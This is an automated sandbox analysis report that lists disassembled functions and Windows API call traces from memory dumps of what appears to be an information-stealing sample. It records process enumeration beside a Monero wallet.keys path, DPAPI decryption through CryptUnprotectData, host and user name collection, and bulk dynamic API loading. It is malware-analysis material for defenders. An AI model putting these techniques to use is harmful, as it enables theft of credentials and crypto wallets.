Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 14c04f0f7c9568a7912ccd3a3a21cab37bd0f818667a992698ca4372f55b084c
Instruction ID: d5f185fd060749936633e224c65d24439c33a347008bce29880c6fabd2d2e297
Opcode Fuzzy Hash: 14c04f0f7c9568a7912ccd3a3a21cab37bd0f818667a992698ca4372f55b084c
Instruction Fuzzy Hash: 2B010CB5A05208ABDB14DFA5CD48BEDB7F8FF58300F104189E94AD6640DB749B41DF51

Function 008A8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008B05B7), ref: 008A86CA
Process32First.KERNEL32(?,00000128), ref: 008A86DE
Process32Next.KERNEL32(?,00000128), ref: 008A86F3

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

CloseHandle.KERNEL32(?), ref: 008A8761

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: b651c0857f3eaab4dd5f835d21e37653f284c0bdf59154b75be3542768deac5a
Instruction ID: 92d8e51c00c383f6c26a8440655842f70cc7917060d5a94f1f4f99ded6fd7c71
Opcode Fuzzy Hash: b651c0857f3eaab4dd5f835d21e37653f284c0bdf59154b75be3542768deac5a
Instruction Fuzzy Hash: 38316F71901218EBDB68DF94CC45FEEB778FB46700F1041A9E50AE2A90DB346A45CFA2

Function 008A7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0156DF50,00000000,?,008B0E10,00000000,?,00000000,00000000), ref: 008A7A63
RtlAllocateHeap.NTDLL(00000000), ref: 008A7A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0156DF50,00000000,?,008B0E10,00000000,?,00000000,00000000,?), ref: 008A7A7D
wsprintfA.USER32 ref: 008A7AB7

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: e597e259538e8b92c03b233847a0de90a8a26f61a1daaaeaac283241d6ac04f4
Instruction ID: 2c63d37154ad010ae08bbb493a1a017014bedea133ae6ce8dabc6084eab34808
Opcode Fuzzy Hash: e597e259538e8b92c03b233847a0de90a8a26f61a1daaaeaac283241d6ac04f4
Instruction Fuzzy Hash: DF11ACB1906228EBEB20CF54CC49FAAB778FB00721F00439AE91AD32C0D7381A40CF51

Function 00899B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00899B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00899BA3
LocalFree.KERNEL32(?), ref: 00899BD3

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 3ad7bcabab044535b56688cf584012b6fb2eac077956f05be4f524a3fad83206
Instruction ID: 1219248a99b85cfe02a27ea215f53bc88e1dcd0ca46371c8c6ab1b3340b8068f
Opcode Fuzzy Hash: 3ad7bcabab044535b56688cf584012b6fb2eac077956f05be4f524a3fad83206
Instruction Fuzzy Hash: 48110CB4A01209DFCB04DF98D985AAE77B5FF88300F104559ED1597350D774AE11CF61

Function 008A78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7910
RtlAllocateHeap.NTDLL(00000000), ref: 008A7917
GetComputerNameA.KERNEL32(?,00000104), ref: 008A792F

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 877d77be278ff269a01a313130191c676fde3aaa8db7e28b3dcb3bb1f293f511
Instruction ID: ca228e51b1177dbd834f9c728cad12d218d5126a00613b915bd6050e68bcd6ab
Opcode Fuzzy Hash: 877d77be278ff269a01a313130191c676fde3aaa8db7e28b3dcb3bb1f293f511
Instruction Fuzzy Hash: F00162B1904208EFD710DF94DD45BAFFBB8F705B21F10421AEA45E2680C37859059BA1

Function 008A7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008911B7), ref: 008A7880
RtlAllocateHeap.NTDLL(00000000), ref: 008A7887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 008A789F

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: 643dce002cf8af3798145dea97a19b5181d75cb51edbc92dccbfdec5446be141
Instruction ID: 820edea21970a72f5891a0d343d29b8ef099bb6da3fff7dd5741b0eaefefec4b
Opcode Fuzzy Hash: 643dce002cf8af3798145dea97a19b5181d75cb51edbc92dccbfdec5446be141
Instruction Fuzzy Hash: 3FF04FB2944208ABD700DFD8DD49BAEBBB8FB05721F10025AFA16E2680C77815058BA1

Function 00891160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 0089116A
ExitProcess.KERNEL32 ref: 0089117E

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 2b41da8ab9a5a0b07b4612ef80b9a4ed5ba81c52f1d2ee7dd38263915c9b81d3
Instruction ID: 15e7481d715239cf0292638546aeb62dc063fc423ed9c5a551a25841befbd7a0
Opcode Fuzzy Hash: 2b41da8ab9a5a0b07b4612ef80b9a4ed5ba81c52f1d2ee7dd38263915c9b81d3
Instruction Fuzzy Hash: 97D05E7490530CDBCF00EFE0D8496DDBB78FB08312F001595D906A2340EA305482CBA6

Function 008A9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,01556920), ref: 008A9C2D
GetProcAddress.KERNEL32(75900000,01556680), ref: 008A9C45
GetProcAddress.KERNEL32(75900000,01568FA0), ref: 008A9C5E
GetProcAddress.KERNEL32(75900000,01568F10), ref: 008A9C76
GetProcAddress.KERNEL32(75900000,0156CD18), ref: 008A9C8E
GetProcAddress.KERNEL32(75900000,0156CB20), ref: 008A9CA7
GetProcAddress.KERNEL32(75900000,0155B158), ref: 008A9CBF
GetProcAddress.KERNEL32(75900000,0156CBF8), ref: 008A9CD7
GetProcAddress.KERNEL32(75900000,0156CB08), ref: 008A9CF0
GetProcAddress.KERNEL32(75900000,0156CC10), ref: 008A9D08
GetProcAddress.KERNEL32(75900000,0156CB38), ref: 008A9D20
GetProcAddress.KERNEL32(75900000,01556A00), ref: 008A9D39
GetProcAddress.KERNEL32(75900000,01556700), ref: 008A9D51
GetProcAddress.KERNEL32(75900000,01556720), ref: 008A9D69
GetProcAddress.KERNEL32(75900000,015568C0), ref: 008A9D82
GetProcAddress.KERNEL32(75900000,0156CDA8), ref: 008A9D9A
GetProcAddress.KERNEL32(75900000,0156CB50), ref: 008A9DB2
GetProcAddress.KERNEL32(75900000,0155B1F8), ref: 008A9DCB
GetProcAddress.KERNEL32(75900000,01556740), ref: 008A9DE3
GetProcAddress.KERNEL32(75900000,0156CC58), ref: 008A9DFB
GetProcAddress.KERNEL32(75900000,0156CDC0), ref: 008A9E14
GetProcAddress.KERNEL32(75900000,0156CC88), ref: 008A9E2C
GetProcAddress.KERNEL32(75900000,0156CBC8), ref: 008A9E44
GetProcAddress.KERNEL32(75900000,015566A0), ref: 008A9E5D
GetProcAddress.KERNEL32(75900000,0156CAF0), ref: 008A9E75
GetProcAddress.KERNEL32(75900000,0156CCA0), ref: 008A9E8D
GetProcAddress.KERNEL32(75900000,0156CCB8), ref: 008A9EA6
GetProcAddress.KERNEL32(75900000,0156CCE8), ref: 008A9EBE
GetProcAddress.KERNEL32(75900000,0156CDD8), ref: 008A9ED6
GetProcAddress.KERNEL32(75900000,0156CCD0), ref: 008A9EEF
GetProcAddress.KERNEL32(75900000,0156CBE0), ref: 008A9F07
GetProcAddress.KERNEL32(75900000,0156CB68), ref: 008A9F1F
GetProcAddress.KERNEL32(75900000,0156CD30), ref: 008A9F38
GetProcAddress.KERNEL32(75900000,0156A098), ref: 008A9F50
GetProcAddress.KERNEL32(75900000,0156CC28), ref: 008A9F68
GetProcAddress.KERNEL32(75900000,0156CC40), ref: 008A9F81
GetProcAddress.KERNEL32(75900000,015568E0), ref: 008A9F99
GetProcAddress.KERNEL32(75900000,0156CD48), ref: 008A9FB1
GetProcAddress.KERNEL32(75900000,01556900), ref: 008A9FCA
GetProcAddress.KERNEL32(75900000,0156CD00), ref: 008A9FE2
GetProcAddress.KERNEL32(75900000,0156CC70), ref: 008A9FFA
GetProcAddress.KERNEL32(75900000,01556460), ref: 008AA013
GetProcAddress.KERNEL32(75900000,01556440), ref: 008AA02B
LoadLibraryA.KERNEL32(0156CB80,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA03D
LoadLibraryA.KERNEL32(0156CB98,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA04E
LoadLibraryA.KERNEL32(0156CD60,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA060
LoadLibraryA.KERNEL32(0156CD78,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA072
LoadLibraryA.KERNEL32(0156CBB0,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA083
LoadLibraryA.KERNEL32(0156CD90,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA095
LoadLibraryA.KERNEL32(0156CF88,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA0A7
LoadLibraryA.KERNEL32(0156CE98,?,008A5CA3,008B0AEB,?,?,?,?,?,?,?,?,?,?,008B0AEA,008B0AE3), ref: 008AA0B8
GetProcAddress.KERNEL32(75FD0000,01556500), ref: 008AA0DA
GetProcAddress.KERNEL32(75FD0000,0156CEF8), ref: 008AA0F2
GetProcAddress.KERNEL32(75FD0000,01568940), ref: 008AA10A
GetProcAddress.KERNEL32(75FD0000,0156CEC8), ref: 008AA123
